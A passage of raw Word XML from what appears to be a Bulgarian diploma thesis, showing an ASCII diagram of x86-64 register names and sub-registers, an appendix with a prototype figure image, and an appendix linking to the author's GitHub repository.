          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>64-------------------32---------16--8---0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|rax                 |eax       +--ax---+</w:t>
      </w:r>
      <w:r w:rsidR="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|                    |          |ah |al |</w:t>
      </w:r>
      <w:r w:rsidR="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+----------+---+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|rbx                 |ebx       +--bx---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|                    |          |bh |bl |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+----------+---+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|rcx                 |ecx       +--cx---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|                    |          |ch |cl |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+----------+---+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|rdx                 |edx       +--dx---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|                    |          |dh |dl |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+----------+---+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|rsi                 |esi       +--si---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|                    |          |   |sil|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+----------+---+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|rdi                 |edi       +--di---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|                    |          |   |dil|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+----------+---+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|r8                  |r8d       +--r8w--+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|                    |          |   |r8b|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+----------+---+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|r9                  |r9d       +--r9w--+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|                    |          |   |r9b|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+----------+---+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|r10                 |r10d      +--r10w-+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|                    |          |   |r10b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+----------+---+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|r15                 |r15d      +--r15w-+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|                    |          |   |r15b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+----------+---+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|rbp                 |ebp       +--bp---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|                    |          |   |bpl|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+----------+---+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|rsp                 |esp       +--sp---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|                    |          |   |spl|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+--------------------+----------+---+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00303E70" w:rsidP="00112660">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00112660" w:rsidP="00C23AD4">
      <w:pPr>
        <w:pStyle w:val="Fakeheading"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="231" w:name="_Toc3540819"/>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Приложение 4 - прототип </w:t>
      </w:r>
      <w:r w:rsidR="00C23AD4">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>на Фигура 3-6</w:t>
      </w:r>
      <w:bookmarkEnd w:id="231"/>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C2774A" w:rsidRDefault="00C2774A" w:rsidP="00112660">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00C2774A" w:rsidP="00112660">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1C180E76" wp14:editId="61EF8501">
            <wp:extent cx="5733415" cy="4304823"/>
            <wp:effectExtent l="0" t="0" r="635" b="63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33415" cy="4304823"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00112660" w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00567E8F" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="Fakeheading"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="232" w:name="_Toc3540820"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Прилож</w:t>
      </w:r>
      <w:r w:rsidR="00C23AD4">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:t>ние 5</w:t>
      </w:r>
      <w:r w:rsidR="00112660" w:rsidRPr="00112660">
        <w:t xml:space="preserve"> - Сорс код + CD</w:t>
      </w:r>
      <w:bookmarkEnd w:id="232"/>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00112660" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>GitHub хранилище: https://github.</w:t>
      </w:r>
      <w:bookmarkStart w:id="233" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="233"/>
      <w:r w:rsidRPr="00112660">
        <w:t>com/loosper/diploma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
    </w:p>
